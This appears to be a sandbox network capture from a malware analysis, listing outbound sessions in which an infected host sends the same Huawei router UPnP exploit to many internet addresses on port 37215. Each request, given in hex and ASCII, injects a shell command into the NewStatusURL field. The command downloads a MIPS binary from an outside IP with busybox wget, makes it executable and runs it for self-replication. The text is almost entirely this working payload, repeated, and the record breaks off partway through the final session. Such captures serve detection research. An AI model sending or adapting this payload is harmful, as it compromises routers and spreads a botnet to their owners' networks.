                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1949192.168.2.134194832.127.235.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684283018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1950192.168.2.1353802197.18.232.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684427023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1951192.168.2.1359756157.70.173.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684453964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1952192.168.2.133371281.243.65.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684525013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1953192.168.2.1350652197.126.173.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684552908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1954192.168.2.1353606178.179.174.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684561014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1955192.168.2.135824241.157.22.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684576035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1956192.168.2.134689241.75.44.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684600115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1957192.168.2.1340268202.250.37.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684737921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1958192.168.2.1348220157.18.169.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.684750080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 